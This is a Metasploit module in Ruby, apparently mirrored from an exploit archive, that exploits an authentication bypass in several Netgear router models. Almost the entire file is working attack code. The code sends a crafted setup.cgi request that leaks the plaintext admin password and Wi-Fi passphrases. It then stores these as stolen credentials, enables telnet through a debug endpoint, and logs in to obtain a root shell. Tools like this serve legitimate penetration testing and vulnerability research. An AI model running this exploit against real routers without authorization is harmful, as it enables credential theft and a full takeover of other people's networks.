## https://sploitus.com/exploit?id=PACKETSTORM:180824
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/credential_collection'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Netgear PNPX_GetShareFolderList Authentication Bypass',
'Description' => %q{
This module targets an authentication bypass vulnerability in the mini_http binary of several Netgear Routers
running firmware versions prior to 1.2.0.88, 1.0.1.80, 1.1.0.110, and 1.1.0.84. The vulnerability allows
unauthenticated attackers to reveal the password for the admin user that is used to log into the
router's administrative portal, in plaintext.
Once the password has been been obtained, the exploit enables telnet on the target router and then utiltizes
the auxiliary/scanner/telnet/telnet_login module to log into the router using the stolen credentials of the
admin user. This will result in the attacker obtaining a new telnet session as the "root" user.
This vulnerability was discovered and exploited by an independent security researcher who reported it to SSD.
},
'License' => MSF_LICENSE,
'Author' => [
'Unknown', # Vulnerability discovery and PoC creation.
'Grant Willcox' # Metasploit Module
],
'References' => [
[ 'URL', 'https://kb.netgear.com/000063961/Security-Advisory-for-Authentication-Bypass-Vulnerability-on-the-D7000-and-Some-Routers-PSV-2021-0133' ],
[ 'URL', 'https://ssd-disclosure.com/ssd-advisory-netgear-d7000-authentication-bypass/' ]
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS],
'RelatedModules' => [ 'exploit/linux/telnet/netgear_telnetenable' ] # This module relies on users also running exploit/linux/telnet/netgear_telnetenable to get the shell.
},
'DisclosureDate' => '2021-09-06',
'DefaultTarget' => 0
)
)
end
def check
res = send_request_cgi(
'uri' => '/top.html',
'method' => 'GET'
)
if res.nil?
return Exploit::CheckCode::Unknown('Connection timed out.')
end
unless res.headers['WWW-Authenticate'] =~ /netgear/i
return Exploit::CheckCode::Safe('Target does not appear to be a Netgear router!')
end
# Retrieve model name and firmware version
res = send_request_cgi({ 'uri' => '/currentsetting.htm' })
if res.nil?
return Exploit::CheckCode::Unknown('Connection timed out.')
end
data = res.to_s
firmware_version = data.match(/^Firmware=V(\d+\.\d+\.\d+\.\d+)_(\d+\.\d+\.\d+)/)
if firmware_version.nil?
return Exploit::CheckCode::Unknown('Could not retrieve firmware version!')
end
major_version = firmware_version[1]
minor_version = firmware_version[2]
model_name = data.match(/Model=([a-zA-Z0-9]+)/)
if model_name.nil?
return Exploit::CheckCode::Unknown('Could not retrieve model of the router!')
end
model_name = model_name[1]
# Check model is actually vulnerable
vulnerable_router_models = ['AC2100', 'AC2400', 'AC2600', 'D7000', 'R6220', 'R6230', 'R6260', 'R6330', 'R6350', 'R6700v2', 'R6800', 'R6850', 'R6900v2', 'R7200', 'R7350', 'R7400', 'R7450']
unless vulnerable_router_models.include?(model_name)
return Exploit::CheckCode::Safe('Not a vulnerable router model!')
end
# Check version is vulnerable
print_status("Target is a #{model_name} router running firmware version #{major_version}_#{minor_version}")
if (Rex::Version.new(major_version) >= Rex::Version.new('1.2.0.0')) && (Rex::Version.new(major_version) < Rex::Version.new('1.2.0.88'))
return Exploit::CheckCode::Appears
elsif (Rex::Version.new(major_version) >= Rex::Version.new('1.0.1.0')) && (Rex::Version.new(major_version) < Rex::Version.new('1.0.1.80'))
return Exploit::CheckCode::Appears
elsif (Rex::Version.new(major_version) >= Rex::Version.new('1.1.0.0')) && (Rex::Version.new(major_version) < Rex::Version.new('1.1.0.110')) # Need more work on this as this isn't a good check for affected versions and may overlap with patched versions.
return Exploit::CheckCode::Appears
elsif (Rex::Version.new(major_version) >= Rex::Version.new('1.1.0.0')) && (Rex::Version.new(major_version) < Rex::Version.new('1.1.0.84')) # Need more work on this to make sure we apply this to the correct systems.
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe('Not a vulnerable router version!')
end
end
def run
print_status('Attempting to leak the password of the admin user...')
res = send_request_cgi(
'uri' => '/setup.cgi',
'method' => 'GET',
'vars_get' => {
'next_file' => 'BRS_swisscom_success.html',
'x' => 'todo=PNPX_GetShareFolderList'
}
)
html_response = res.get_html_document
leaked_info_array = []
html_response.xpath('//div[@id="passpharse"]/following-sibling::div[@class="right_div"]').map { |node| leaked_info_array << node.text }
unless leaked_info_array.include?('admin')
fail_with(Failure::UnexpectedReply, 'Application did not respond with the expected admin username in its response!')
end
wifi_password = leaked_info_array[0]
wifi_password_5g = leaked_info_array[1]
username = leaked_info_array[2]
password = leaked_info_array[3]
network_names = html_response.xpath('//div[@id="network_name"]/following-sibling::div[@class="right_div"]')
if network_names.length < 2
print_warning('Application did not respond with an SSID in its response!')
else
wifi_ssid = network_names[1].text
end
network_names_5g = html_response.xpath('//div[@id="network_name_5G"]/following-sibling::div/child::text()')
if network_names_5g.empty?
print_warning('Application did not respond with an 5G SSID in its response!')
else
wifi_ssid_5g = network_names_5g.text
end
if wifi_ssid_5g.empty? || wifi_password_5g.empty?
print_warning('5G SSID information contained blank strings, skipping saving this info to the database!')
else
# Create 5G WiFi credential
wifi_data_5g = {
origin_type: :import,
address: datastore['RHOST'],
module_fullname: fullname,
workspace_id: myworkspace_id,
filename: "wifi_#{wifi_ssid_5g}_creds.txt",
username: wifi_ssid_5g,
private_data: wifi_password_5g,
private_type: :password
}
create_credential(wifi_data_5g)
end
if wifi_ssid.empty? || wifi_password.empty?
print_warning('SSID information contained blank strings, skipping saving this info to the database!')
else
# Create regular WiFi credential
wifi_data = {
origin_type: :import,
address: datastore['RHOST'],
module_fullname: fullname,
workspace_id: myworkspace_id,
filename: "wifi_#{wifi_ssid}_creds.txt",
username: wifi_ssid,
private_data: wifi_password,
private_type: :password
}
create_credential(wifi_data)
end
if username.empty? || password.empty?
fail_with(Failure::UnexpectedReply, 'Application responded with expected content, but the matched content was an empty string for some reason!')
end
print_good("Can log into target router using username #{username} and password #{password}")
print_status('Attempting to retrieve /top.html to verify we are logged in!')
print_status('Sending one request to grab authorization cookie from headers...')
cookie_jar.clear
res = send_request_cgi(
'uri' => '/top.html',
'method' => 'GET',
'keep_cookies' => true
)
if res.nil?
fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
end
if cookie_jar.empty?
fail_with(Failure::UnexpectedReply, "Router didn't respond with the expected Set-Cookie header to a response to /top.html!")
end
print_status('Got the authentication cookie, associating it with a logged in session...')
res = send_request_cgi(
'uri' => '/top.html',
'method' => 'GET',
'authorization' => basic_auth(username, password)
)
if res.nil?
fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
end
result = res.get_html_document
if result.xpath("//div[@id='firm_version']/text()").empty? # Find all div tags with an "id" attribute named "firm_version" and find its text value.
fail_with(Failure::UnexpectedReply, 'The target router did not respond with a firmware version when /top.html was requested. Are we logged in?')
end
print_good('Successfully logged into target router using the stolen credentials!')
print_status('Attempting to store the stolen admin credentials for future use...')
# Create HTTP Login Data
store_valid_credential(user: username, private: password, private_type: :password)
print_status('Enabling telnet on the target router...')
res = send_request_cgi(
'uri' => '/setup.cgi',
'method' => 'GET',
'vars_get' => {
'todo' => 'debug'
},
'authorization' => basic_auth(username, password)
)
if res.nil?
fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
end
unless res.body.include?('Debug Enable!')
fail_with(Failure::UnexpectedReply, 'Target did not enable debug mode for some reason!')
end
print_good('Telnet enabled on target router!')
handler = framework.modules.create('auxiliary/scanner/telnet/telnet_login')
handler.datastore['RHOSTS'] = datastore['RHOST']
File.delete('netgear_pnpx_wordlist.txt') if File.exist?('netgear_pnpx_wordlist.txt') # Make sure the file is deleted if it already exists.
file_handle = File.open('netgear_pnpx_wordlist.txt', 'wb')
file_handle.write("#{username} #{password}")
file_handle.close
handler.datastore['USERPASS_FILE'] = 'netgear_pnpx_wordlist.txt'
print_status("Attempting to log in with #{username}:#{password}. You should get a new telnet session as the root user")
handler.run
File.delete('netgear_pnpx_wordlist.txt') if File.exist?('netgear_pnpx_wordlist.txt') # Remove the file once we are done.
end
end